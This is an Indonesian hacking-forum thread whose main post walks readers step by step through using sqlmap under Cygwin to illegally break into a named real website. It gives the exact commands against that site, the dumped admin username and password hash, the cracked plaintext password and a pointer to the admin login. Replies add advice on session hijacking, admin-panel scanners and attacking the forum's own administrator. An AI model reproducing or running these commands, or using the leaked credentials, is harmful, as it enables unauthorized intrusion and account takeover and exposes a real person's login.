[tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))

~WARNING~
Threat dibawah ini berisi banyak gambar, jadi maklum kalo gambarnya banyak yg gak nampak, itu karena koneksi kalian lemot, dan buka kesalahan TS-nya

oke gan ...pada tutorial di cmonhack ini ane akan ngebahas gmana cara ngedapetin username dan password admin website secara illegal gan pke sqlmap yg dijalankan di Cygwin
untuk metode sql injection biasa, biasanya klo mw inject, malah forbidden, 404 Not Found,
contoh :
*agan nemuin site ug vuln,
SS :

*kan ada pesan errornya tuh web, tpi setelah agan masukin perintah +union+select+1,2,....12-- malah gak keluar tuh angka db nya, tpi web nya malah forbidden,


tpi klo pke metode yg ane share ini,..bisa aja nembus gan..hehe
summon faiznurfaza,

gak usah kakehan ngomong cuk.
0. download project sqlmap nya >> langsung download gan
1. download Cygwin nya di situs rersminya gan.
2. setelah selesai download, langsung install Cygwinnya..agan cuma perlu next, next, next, next , tapi pada bagian instalasi Select Packages, pastikan semuanya sudah terinstal ..


3. Setelah komponen Cygwin terinstall semua, buka Cygwin


*sebelum tahap selanjutnya, agan2 perlu mengenal command2 dalam Sqlmap seperti :

-u (URL TARGET)
--dbs (Mendapatkan DATABASE dalam suatu WEBSITE)
-D (Masuk kedalam DATABASE)
--tables (Memeriksa ada berapa TABLES didalam DATABASE suatu WEBSITE)
-T (Masuk kedalam TABLE)
--columns (Memeriksa ada berapa COLUMNS didalam TABLE suatu WEBSITE)
-C (Masuk kedalam COLUMNS)
--dump (Mengeluarkan isi dari COLUMNS)

4. setelah agan2 paham perintah2 nya, sekarang saatnya pengexploitan gan(gaya sitik)
5. DAN jangan lupa, file sqlmap.gzip yg kita download tadi masih di Compress, jadi harus diExtract dulu ya
saumpama ane extract di D:\cmonhack\sqlmap
SS:

---------------------------------------------------------------------------------------------------------

--Tahap Exploiting--

target inject = [You must be registered and logged in to see this link.]

1. Di Cygwin, tulis perintah untuk masuk ke Direktory dimana kita tadi menyimpan file download sqlmap.gzip yg telah kita extract ..
saumpama kita Extract di D:\cmonhack\sqlmap, jadi di Cygwin kita hrus masukin perintah :

Code:

cd D:\cmonhack

2. Trus setelah itu, kita masukkan lagi

Code:

cd sqlmap

3. Dan kita sudah masuk direktory sqlmap nya..
di dalam folder D:\cmonhack\sqlmap, yg kita pakai untuk exploiting adalah file sqlmap.py nya..

4. Jika Cygwin sudah masuk ke Direktory sqlmapnya, selanjutnya di Cygwin kita tulis perintah seperti :

Code:

./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 --dbs

database :
[*] information_schema
[*] stirlin1_heritage

5. Kita temukan 2 database seperi gambar di atas, tpi kita gunakan adalah database stirlin1_heritage

6. Proses selanjutnya, kita masukkan perintah seperti ini :

Code:

./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -D stirlin1_heritage --tables

dan hasilnya akan seperti ini :

itu adalah semua table yg telah dikumpulkan oleh om sqlmap..

7. Selanjutnya, kita akan melihat isi column dari salah satu table yaitu table access dengan perintah seperi berikut :

Code:

./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -T access --columns

8. Terdapat 2 buah Colum pada table access yaitu pass dan user seperti gambar di atas
+--------+----------+
| Column | Type |
+--------+----------+
| pass | tinytext |
| user | tinytext |
+--------+----------+


9. Langkah selanjutnya, kita lakukan dump ke column pass dan user, dgn cara :

Code:

./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -T access -C user,pass --dump

di situ, kita di suruh masukin perintah Y atau n atau q, masukin aja perintah Y trus Enter

10. Setelah di Enter, maka akan ada pesan kaya gini :

Code:

what's the dictionary's location? [/cygdrive/d/cmonhack/sqlmap/txt/wordlist.txt]

klik Enter aja

11. Lalu muncul lagi pesan

Code:

do you want to use common password suffixes? (slow!) [y/N]

masukin y trus Enter lagi

12. Trus tunggu sampai Proses BruteForce nya selesai 100%


13. Kalau dah selesai 100 persen, maka hasilnya akan seperti ini :
+----------------------------------+------------------------+
| pass | user |
+----------------------------------+------------------------+
| 6b92c50ef6dad109cada972ececead9b | Ros Stirling |
+----------------------------------+------------------------+



14. Ternyata bruteforce dri om sqlmap blum bisa decrypt password MD5 nya om, klo gitu, kita gunian MD5 Decrypter Online di [You must be registered and logged in to see this link.]
ternyata ketemu gan :
6b92c50ef6dad109cada972ececead9b : secure55bm


15. Skarang tinggal cari admin login nya om >> [You must be registered and logged in to see this link.]

tinggal masukin user dan password nya doank gan :

user : Ros Stirling
pass : secure55bm


Kesimpulannya, jika kita make teknik sql injection biasa,,maka memungkin tidak akan berhasil dalam menjalankan attacking, karena bisa saja akan menemui forbidden atau 404 not found di web nya, tpi jika kita pke sqlmap di cygwin, selain mudah dan praktis, web2 yg forbidden ato 404 not found tadi bisa di tembus

Have FUn gan



CREDIT : RieqyNS13

Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?

wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?

cleon wrote:

wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?

hrus disisipi cookie dulu gan, alias session hijacking

Xenobors wrote:

Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?

scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

RieqyNS13 wrote:

cleon wrote:

wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?

hrus disisipi cookie dulu gan, alias session hijacking

Xenobors wrote:

Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?

scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

oke''
tapi kok pas instal jadi lemot koneksiku ?

RieqyNS13 wrote:

cleon wrote:

wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?

hrus disisipi cookie dulu gan, alias session hijacking

Xenobors wrote:

Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?

scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

Wah Cool Abis Neh Gan Btw

Bisa" Neh ID MIMIN CMON Bisa" Kna Juga Neh

Jadi Ngeri Neh Gan Kalo Dibayangin

ga akh males coba,cara jumping aja udah puyeng apa lagi ini,jumping belum apa apa udah langsung masuk backdoor

Ryan San Rakagi wrote:

RieqyNS13 wrote:

hrus disisipi cookie dulu gan, alias session hijacking


scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

Wah Cool Abis Neh Gan Btw

Bisa" Neh ID MIMIN CMON Bisa" Kna Juga Neh

Jadi Ngeri Neh Gan Kalo Dibayangin

tergantung om, klo server database cmonhack berada di komputernya om mimin sendiri, bisa di cari celahnya trus diexploiting om, tpi klo server cmonhack gak di komputernya om mimin, tpi di webserver kaya [You must be registered and logged in to see this link.] kita akan kesulitan om

Thread Move to Computer Freakz All About Software By Kurohige

Kurohige wrote:

Thread Move to Computer Freakz All About Software By Kurohige

hehe,,makasih gan, klo seandainya ada subforum hacking for dummies, ane taruh di situ aja gan